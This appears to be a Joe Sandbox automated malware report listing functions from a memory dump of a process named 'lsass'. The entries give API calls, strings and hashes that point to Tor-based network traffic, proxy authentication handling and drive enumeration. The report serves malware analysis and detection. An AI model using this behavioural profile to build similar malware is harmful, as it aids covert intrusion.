Instruction Fuzzy Hash: 9CD1FC70E0818A9BDF05CB94C5949FEB7F2AF81345F28C1A9D4996B242C2795F80DB72

Uniqueness

Uniqueness Score: -1.00%

Function 007769E0 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 227stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 00776B61
task.LIBCPMTD ref: 00777004

Strings

(Tx, xrefs: 00776AC7, 00776ACD
8Tx, xrefs: 00776BEC
%s %s %s, xrefs: 00776C1F
%s %s %s, xrefs: 00776A57
0Tx, xrefs: 00776B8B
://, xrefs: 00776A75

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: lstrlentask
String ID: %s %s %s$%s %s %s$(Tx$0Tx$8Tx$://
API String ID: 773520081-1192421161
Opcode ID: cf9933944a0cca9db747485c938f10193f210b206a2346c4e8ae9158f6893fab
Instruction ID: 3cee96d494b4aa7226619cca1fa2263a6a7a7f4d24c3ed9b427585d690577ad5
Opcode Fuzzy Hash: cf9933944a0cca9db747485c938f10193f210b206a2346c4e8ae9158f6893fab
Instruction Fuzzy Hash: DF918D70A442289BDF28DF64CC84BEE77B5BF44344F14C098F609A6286D779AE84CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0077C6A0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 196COMMON

Download Yara Rule

APIs

Part of subcall function 007735D0: EnterCriticalSection.KERNEL32(00000001,00000001,?,0078403F,00000001,?,00783F8F,-00000007,?,0077EEB2,-00000053,?,0077EE82,-00804C3B,?,0077ED83), ref: 007735DB

shutdown.WS2_32(?,00000001), ref: 0077C78B
shutdown.WS2_32(?,?), ref: 0077C7B8
shutdown.WS2_32(?,00000002), ref: 0077C7F2
shutdown.WS2_32(?,00000002), ref: 0077C804

Strings

CONNECT, xrefs: 0077C718
502 Bad Gateway, xrefs: 0077C75C

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: shutdown$CriticalEnterSection
String ID: 502 Bad Gateway$CONNECT
API String ID: 2480472672-1541487254
Opcode ID: 979582eeb1fdbf1c58aab178e8431c204b264d991d329f00960611ca3b3e2ca1
Instruction ID: fa772429bb639e4b3a01d6ed7d65b0068dbf503fa1e006afa0fec77a43ef7d61
Opcode Fuzzy Hash: 979582eeb1fdbf1c58aab178e8431c204b264d991d329f00960611ca3b3e2ca1
Instruction Fuzzy Hash: 8D719470B00245ABDF09DB61C895BBE7B71BF45395F08C0ACE9899B2C3CB399A41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00780870 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55registryCOMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 00780876
RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 007808C4
RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 007808F1
RegCloseKey.ADVAPI32(?), ref: 0078090E

Strings

NoDrives, xrefs: 007808E8
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 007808B7

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: CloseDrivesLogicalOpenQueryValue
String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
API String ID: 2666887985-3471754645
Opcode ID: 8c002fc3c56b29415636ff08d1ab0b494452840da5a620107cc4af18fc90f216
Instruction ID: bfd49cbea6acb6d7debc3fa236d49ea1d5384b56c58eef40202aca4bf572fa58
Opcode Fuzzy Hash: 8c002fc3c56b29415636ff08d1ab0b494452840da5a620107cc4af18fc90f216
Instruction Fuzzy Hash: DA11F9B1E8020AABEB10DFD1D949BEEB7B4BB48304F208048E511A7281D3BC6A45CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 00780370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36,00000001,00000000,00000000,00000000), ref: 00780387
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 007803A6
HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 007803CF
InternetCloseHandle.WININET(00000000), ref: 007803F8
InternetCloseHandle.WININET(00000000), ref: 00780402

Strings

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36, xrefs: 00780382

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: Internet$CloseHandleOpen$HttpInfoQuery
String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
API String ID: 3871184103-255850170
Opcode ID: 262df9da936e7b725e72acc09487b8ef33d955efc2603c09c419137017e67070
Instruction ID: f5a8affd2a91eb0786b892ac13bfd5c3d2bf1ab30384f6a45811da02dd9deda8
Opcode Fuzzy Hash: 262df9da936e7b725e72acc09487b8ef33d955efc2603c09c419137017e67070
Instruction Fuzzy Hash: 3B111CB5A80248FFDB10DFA4CC49F9EB7B5BB04700F208558EA117B2C0C7B96A44CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00773E20 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000), ref: 00773FD3

Strings

://, xrefs: 0077400E
http=, xrefs: 00773F0F
%hu, xrefs: 007740AD
https=, xrefs: 00773F3D
socks=, xrefs: 00773F6B

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: lstrlen
String ID: %hu$://$http=$https=$socks=
API String ID: 1659193697-336120641
Opcode ID: e51c70dab7a59d4e40eab501cd9d8ea77fd41ec402ed644ba37fbd1b9d6c2cec
Instruction ID: e4732a042846f8c3987246f106f4e6b04bc11229ea53f86973c23832ba89e417
Opcode Fuzzy Hash: e51c70dab7a59d4e40eab501cd9d8ea77fd41ec402ed644ba37fbd1b9d6c2cec
Instruction Fuzzy Hash: 4C919074A00259DFDF14CF94CC88BAEBBB5BF48344F24C498E549AB241DB799A84CF94

Uniqueness

Uniqueness Score: -1.00%

Function 007746D0 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 192stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(-00000104), ref: 007747C6

Part of subcall function 00772100: memmove.MSVCRT ref: 0077210F

lstrlenA.KERNEL32(00000000), ref: 007748E7

Strings

Negotiate , xrefs: 00774705
Proxy-Authorization: %s %s, xrefs: 00774889
NTLM , xrefs: 00774718
Kerberos , xrefs: 0077472B

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: lstrlen$memmove
String ID: Kerberos $NTLM $Negotiate $Proxy-Authorization: %s %s
API String ID: 1832346882-695359478
Opcode ID: 0c1e2efa78649710a5355bd10566014c4e21a851eb088d06fa74d17ac96d2c1b
Instruction ID: 93a1f7741ff27bc46cc879193822500fb7b317134826a49a6140c9a0f73299a3
Opcode Fuzzy Hash: 0c1e2efa78649710a5355bd10566014c4e21a851eb088d06fa74d17ac96d2c1b
Instruction Fuzzy Hash: 4A716FB5A00249AFDF04DF94D885FEEB7B5AF48344F14C058EA19AB381D774AA11CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0077EA20 Relevance: 9.1, APIs: 6, Instructions: 75sleepthreadnetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 00778FD0: closesocket.WS2_32(00000000), ref: 00778FE7
Part of subcall function 00778FD0: WaitForSingleObject.KERNEL32(00000000,00001388,00000000,?,0077E987,00000000,00000000,00000000), ref: 00778FF9
Part of subcall function 00778FD0: TerminateThread.KERNEL32(00000000,00000000,?,0077E987,00000000,00000000,00000000), ref: 00779008
Part of subcall function 00778FD0: CloseHandle.KERNEL32(00000000,?,0077E987,00000000,00000000,00000000), ref: 00779014

Sleep.KERNEL32(000007D0,00000000,00000001,00000001,00000000), ref: 0077EA59
CloseHandle.KERNEL32(?), ref: 0077EA70
WaitForMultipleObjects.KERNEL32(?,?,00000001,000061A8), ref: 0077EA91
TerminateThread.KERNEL32(?,00000000), ref: 0077EAC7
CloseHandle.KERNEL32(?), ref: 0077EADB
WSACleanup.WS2_32 ref: 0077EB0E

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: CloseHandle$TerminateThreadWait$CleanupMultipleObjectObjectsSingleSleepclosesocket
String ID:
API String ID: 3883441888-0
Opcode ID: 0c05a9d36579b09e18bc5f88a3be12c9be5454392c1b14e4b83da661148137cd
Instruction ID: 218a44e5025fdccebfc8a74ec44bcbb5faba55a0956db5134ca59c944424cc4c
Opcode Fuzzy Hash: 0c05a9d36579b09e18bc5f88a3be12c9be5454392c1b14e4b83da661148137cd
Instruction Fuzzy Hash: 53316F74A40304FBDB04DBA4DC59F9DBB71BF48305F148184F605AB3C2D6796A809BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0077D2C0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

Part of subcall function 00773B80: GetTickCount.KERNEL32 ref: 00773B86

htonl.WS2_32(?), ref: 0077D387

Part of subcall function 007735D0: EnterCriticalSection.KERNEL32(00000001,00000001,?,0078403F,00000001,?,00783F8F,-00000007,?,0077EEB2,-00000053,?,0077EE82,-00804C3B,?,0077ED83), ref: 007735DB

memcmp.MSVCRT ref: 0077D4AC
memmove.MSVCRT ref: 0077D520

Strings

GET /tor/rendezvous2/%s HTTP/1.1Host: localAccept-Encoding: identityUser-Agent: %s, xrefs: 0077D5B4
P, xrefs: 0077D417

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: CountCriticalEnterSectionTickhtonlmemcmpmemmove
String ID: GET /tor/rendezvous2/%s HTTP/1.1Host: localAccept-Encoding: identityUser-Agent: %s$P
API String ID: 495902089-332776292
Opcode ID: ab3e5c484bb37ca5e00a1eb2b9226361a4a84bf992d1dcf5bf1a7c5f93570d11
Instruction ID: 5f0445c6250dbdc6621bf37177a751938f2d1e3d10d8cfd74ddce2ebbe247c03
Opcode Fuzzy Hash: ab3e5c484bb37ca5e00a1eb2b9226361a4a84bf992d1dcf5bf1a7c5f93570d11
Instruction Fuzzy Hash: 3DB18FB490011A9BDF28DB94CC95BFEB7B5BF44384F0481A9E50DA7282E7789E84CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00777C30 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 194COMMON

Download Yara Rule

APIs

Part of subcall function 00772100: memmove.MSVCRT ref: 0077210F

inet_ntop.WS2_32(00000002,?,?,00000400), ref: 00777DBD

Strings

http://%s:%hu/tor/server/fp/%s.z, xrefs: 00777C50
router %s %s , xrefs: 00777C66
onion-key, xrefs: 00777C92
-----END RSA PUBLIC KEY-----, xrefs: 00777C7C

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: inet_ntopmemmove
String ID: -----END RSA PUBLIC KEY-----$http://%s:%hu/tor/server/fp/%s.z$onion-key$router %s %s
API String ID: 1410992348-1243584039
Opcode ID: dd3ed1b9c7a687134ce8011eac7242aa8e98686d039c7a9f97e321d34d37bc4f
Instruction ID: 164b74e1aa711ef40d41b88eff175aa6304155813c0889d88a5d85404788f32f
Opcode Fuzzy Hash: dd3ed1b9c7a687134ce8011eac7242aa8e98686d039c7a9f97e321d34d37bc4f
Instruction Fuzzy Hash: D8818271A442189BDF28CB54CC85FE9B375BB54304F04C1E9F60DAA282DB785B85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0077DEE0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 187COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 0077E24B
memmove.MSVCRT ref: 0077E2B3
memmove.MSVCRT ref: 0077E2F7
PostQueuedCompletionStatus.KERNEL32(?,00000001,00000010,?), ref: 0077E333

Strings

@, xrefs: 0077DEEF

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: memmove$CompletionPostQueuedStatus
String ID: @
API String ID: 2107774671-2766056989
Opcode ID: d82875b98f2d0fe3efe3b878edac6d67f5013f63b3843ce635feb4b2fb05996c
Instruction ID: 3501b3f925acfd123ae806e9ede0a6e093fde66073d59ec82fcb3bc8f3162df7
Opcode Fuzzy Hash: d82875b98f2d0fe3efe3b878edac6d67f5013f63b3843ce635feb4b2fb05996c
Instruction Fuzzy Hash: 05816074B00119ABDF2ADF11DC95AA9B7B9AF54344F00C4E9E50D5B381DA3A9F84CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0077E780 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 154networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 0077E7C9

Part of subcall function 007735B0: GetProcessHeap.KERNEL32(?,0077E7DC), ref: 007735B3

WSACleanup.WS2_32 ref: 0077E9FF

Part of subcall function 00773C60: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00773D9B

Part of subcall function 00772120: memmove.MSVCRT ref: 00772194
Part of subcall function 00772120: CryptAcquireContextA.ADVAPI32(0078A014,00000000,?,0000000D,F0000000), ref: 007721DE
Part of subcall function 00772120: CryptAcquireContextA.ADVAPI32(0078A11C,00000000,?,00000018,F0000000), ref: 007721FA
Part of subcall function 00772120: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00772223
Part of subcall function 00772120: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0077223C

CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0077E80F

Part of subcall function 007735D0: EnterCriticalSection.KERNEL32(00000001,00000001,?,0078403F,00000001,?,00783F8F,-00000007,?,0077EEB2,-00000053,?,0077EE82,-00804C3B,?,0077ED83), ref: 007735DB

Part of subcall function 00778E30: socket.WS2_32(00000002,00000001,00000006), ref: 00778E40
Part of subcall function 00778E30: setsockopt.WS2_32(00000000,0000FFFF,00000004,00000001,00000004), ref: 00778E73
Part of subcall function 00778E30: htons.WS2_32(00000000), ref: 00778E8C
Part of subcall function 00778E30: htonl.WS2_32(7F000001), ref: 00778EA4
Part of subcall function 00778E30: bind.WS2_32(00000000,?,00000010), ref: 00778EB9
Part of subcall function 00778E30: listen.WS2_32(00000000,00000064), ref: 00778ED0
Part of subcall function 00778E30: getsockname.WS2_32(00000000,?,00000010), ref: 00778EF4
Part of subcall function 00778E30: htons.WS2_32(?), ref: 00778F2D
Part of subcall function 00778E30: htons.WS2_32(?), ref: 00778F56

CloseHandle.KERNEL32(?,00000000,00000000,00000000), ref: 0077E9CE

Strings

;w, xrefs: 0077E87F, 0077E882

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: ContextCrypt$htons$AcquireReleaseTime$CleanupCloseCompletionCreateCriticalEnterFileHandleHeapPortProcessSectionStartupSystembindgetsocknamehtonllistenmemmovesetsockoptsocket
String ID: ;w
API String ID: 3177777191-3485967011
Opcode ID: 9e60a67fcfa57326e1126258034404f29d46d954e5d15909207620c113846efb
Instruction ID: b614d64ae5140515db74c834e48d69abe8e223cf2ec58441e73fa9389775f58a
Opcode Fuzzy Hash: 9e60a67fcfa57326e1126258034404f29d46d954e5d15909207620c113846efb
Instruction Fuzzy Hash: 0051B170B012249FEF259B10CC19BBA7371BF4A344F5480D8E68D6A2C2D639AD80CF62

Uniqueness

Uniqueness Score: -1.00%

Function 0077EB80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT ref: 0077EBA4
??2@YAPAXI@Z.MSVCRT ref: 0077EBD3
codecvt.LIBCPMTD ref: 0077EC91
codecvt.LIBCPMTD ref: 0077ECC4

Strings

Y>x, xrefs: 0077EC27, 0077EBE4

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: ??2@codecvt
String ID: Y>x
API String ID: 664657501-2201431646
Opcode ID: 065869228e974dca3ab494a2f127eabe108657c77ddd5af2b8c0bceb42cbba63
Instruction ID: 3739b7e7a360ac9212c208dfaacea189dac12c3fa3890054b2ecec718a33aaed
Opcode Fuzzy Hash: 065869228e974dca3ab494a2f127eabe108657c77ddd5af2b8c0bceb42cbba63
Instruction Fuzzy Hash: CA415274D48308EFEF15DF54E8897AEBBB0BB08344F24C4AAD405662A0D77D1985CF66

Uniqueness

Uniqueness Score: -1.00%

Function 0077D33E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

Part of subcall function 00773B80: GetTickCount.KERNEL32 ref: 00773B86

htonl.WS2_32(?), ref: 0077D387

Part of subcall function 007735D0: EnterCriticalSection.KERNEL32(00000001,00000001,?,0078403F,00000001,?,00783F8F,-00000007,?,0077EEB2,-00000053,?,0077EE82,-00804C3B,?,0077ED83), ref: 007735DB

memcmp.MSVCRT ref: 0077D4AC
memmove.MSVCRT ref: 0077D520

Strings

P, xrefs: 0077D417

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: CountCriticalEnterSectionTickhtonlmemcmpmemmove
String ID: P
API String ID: 495902089-3110715001
Opcode ID: ad710f0f45a22a5124e29d6ee0cb703184a1d92143f2b582ab599f22e4068f59
Instruction ID: 1fb4df3b875b998e047873390c73d1bf71692532fcfd93eb57ad7a5a87ff548b
Opcode Fuzzy Hash: ad710f0f45a22a5124e29d6ee0cb703184a1d92143f2b582ab599f22e4068f59
Instruction Fuzzy Hash: F05192B4D0051ADBDF18EB94CC95BFEB776BF54344F0480A8E109A7282E7789E448F51

Uniqueness

Uniqueness Score: -1.00%

Function 007773B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

_longjmp.LIBVCRUNTIMED ref: 007773C2
memmove.MSVCRT ref: 00777440

Strings

yuw, xrefs: 007773F9, 00777430, 007773FC, 00777433
yuw, xrefs: 007773BE, 00777434, 0077743A, 00777448, 00777450, 007773C1

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: _longjmpmemmove
String ID: yuw$yuw
API String ID: 3772547588-483977393
Opcode ID: 91b4bc676493575068107c725abba6cce09b1457c8cbea3666a5a2e6da6e24b5
Instruction ID: be3d7a94631bb69a768e266d6107a030dbaf727ded32223b1fe05745ef600fbc
Opcode Fuzzy Hash: 91b4bc676493575068107c725abba6cce09b1457c8cbea3666a5a2e6da6e24b5
Instruction Fuzzy Hash: 38314275D0418A9FCF08CFA8C891EFFBBB6AF45344F08C059E85867341D674AA14CB61

Uniqueness

Uniqueness Score: -1.00%

Function 007807F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

GetDriveTypeW.KERNEL32(007807CF), ref: 007807FD
QueryDosDeviceW.KERNEL32(007807CF,?,00000208), ref: 0078083C
StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00780854

Strings

\??\, xrefs: 00780848

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: DeviceDriveQueryType
String ID: \??\
API String ID: 1681518211-3047946824
Opcode ID: 5d6d84cc36a31d16b7c239f1d86ddff0fd0806ecf650209c904cee2fde705aaa
Instruction ID: 2a6d806577c24d49c73c119ade051b6d5d69dd77381765ede494861da8b95569
Opcode Fuzzy Hash: 5d6d84cc36a31d16b7c239f1d86ddff0fd0806ecf650209c904cee2fde705aaa
Instruction Fuzzy Hash: C80112B498020CEBCB60DF65DD4DAD9B7B4AB04704F10C0A9AA19A7240E6789FC9CFD4

Uniqueness

Uniqueness Score: -1.00%

Function 0077D040 Relevance: 6.2, APIs: 4, Instructions: 202stringnetworkCOMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 0077D088
memmove.MSVCRT ref: 0077D0C5
lstrlenA.KERNEL32(?,00000003,00000004,00000000,00000003,0000000D,00000000,00000000,?,?,?,00000001), ref: 0077D167
htons.WS2_32(?), ref: 0077D23A

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: htonslstrlenmemcmpmemmove
String ID:
API String ID: 302187628-0
Opcode ID: 6f46e8aef12e73a743a09ecf429305d98e0b3ce7ee4bf353296f80d7c9618a95
Instruction ID: a00e8158de93f0deef7c653072bc02341a003223c2b91cd14455fdd7c5633ef7
Opcode Fuzzy Hash: 6f46e8aef12e73a743a09ecf429305d98e0b3ce7ee4bf353296f80d7c9618a95
